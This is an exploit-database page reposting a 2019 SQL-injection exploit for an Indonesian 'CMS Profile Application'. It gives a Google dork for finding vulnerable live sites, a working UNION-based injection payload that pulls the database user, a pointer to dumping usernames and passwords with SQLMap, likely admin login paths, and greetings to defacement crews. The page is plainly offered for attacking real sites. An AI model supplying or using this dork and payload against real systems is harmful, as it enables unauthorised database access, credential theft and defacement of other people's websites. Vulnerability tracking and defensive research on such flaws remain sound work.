Advertisement






CMS Profile Application NSI SQL-Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 Varies High
Author Risk Exploitation Type Date
N/A High Remote 2019-05-05
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050052

Below is a copy:

CMS Profile Application NSI SQL-Injection Vulnerability
# Exploit Title: CMS Profile Application NSI SQL-Injection Vulnerability
# Dork: inurl:/semua-tokoh.html site:id
# Date: 5-5-2019
# Exploit Author: ./Sn00py
# Team: Indonesian Code Party
# Vendor Homepage: https://www.nusansifor.com/
# Software Link: N/A
# Category: Webapps
# Version: 1.0
# Tested on: Windows 10 Pro
# CVE : N/A
=======================================
[+]Proof Of Concept:
First, you find out if the site has a search feature keywords and if you enter a string in the alert database errors occur the vuln.

[+]Exploit:
' and false div @s:=(user()) union select 1,2,@s,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -

You can continue to dump database with the SQLMap manual or to take user and password~

[+]Login:
Administrator
Admin
Adminweb
Webadmin

[+]Demo? No Demo ^^ Happy Injecting~


Greetz: DarkOct02 - Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.